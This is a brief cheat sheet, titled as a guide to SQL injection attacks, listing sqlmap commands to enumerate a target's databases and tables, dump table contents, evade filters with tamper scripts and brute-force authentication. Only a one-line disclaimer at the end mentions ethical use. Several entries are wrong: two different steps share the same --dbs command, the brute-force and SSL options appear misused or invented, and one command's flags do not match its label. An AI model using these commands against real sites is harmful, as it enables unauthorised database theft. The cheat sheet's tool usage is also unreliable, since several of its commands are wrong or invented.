How to Sql Injection Attack --PKO

Here's a cheat sheet for using SQLmap in Kali Linux:

  1. Basic Usage:

    
    sqlmap -u <url>

  2. Check for SQL Injection:

    
    sqlmap -u <url> --dbs

  3. List All Databases:

    
    sqlmap -u <url> --dbs

  4. List Tables of a Database:

    
    sqlmap -u <url> -D <database name> --tables

  5. Dump Data of a Table:

    
    sqlmap -u <url> -D <database name> -T <table name> --dump

  6. Check the Level of Injection:

    
    sqlmap -u <url> --level=3

  7. Use a Proxy:

    
    sqlmap -u <url> --proxy=<proxy address>

  8. Provide Login Credentials:

    
    sqlmap -u <url> --auth-type=<type> --auth-cred=<credentials>

  9. Tamper with Injection Point:

    
    sqlmap -u <url> --tamper=<tamper script>

  10. Use a Config File:

    
    sqlmap -c <config file>

  11. Brute Force an Authentication:

    
    sqlmap -u <url> --auth-type=<type> --user=<user list> --password=<password list>

  12. Ignore Certificates:

    
    sqlmap -u <url> --ignore-ssl-errors

  13. Use a Delay:

    
    sqlmap -u <url> --delay=<delay time>

  14. Skip Crawling and Fingerprinting:

    
    sqlmap -u <url> --skip-waf --crawl=0 --level=5

  15. Use Multiple Threads:

    
    sqlmap -u <url> --threads=<number of threads>

Please note that SQLmap should only be used for ethical and legal purposes, and with the permission of the target website's owner. Also, some of the options listed above may not be applicable or recommended in all situations.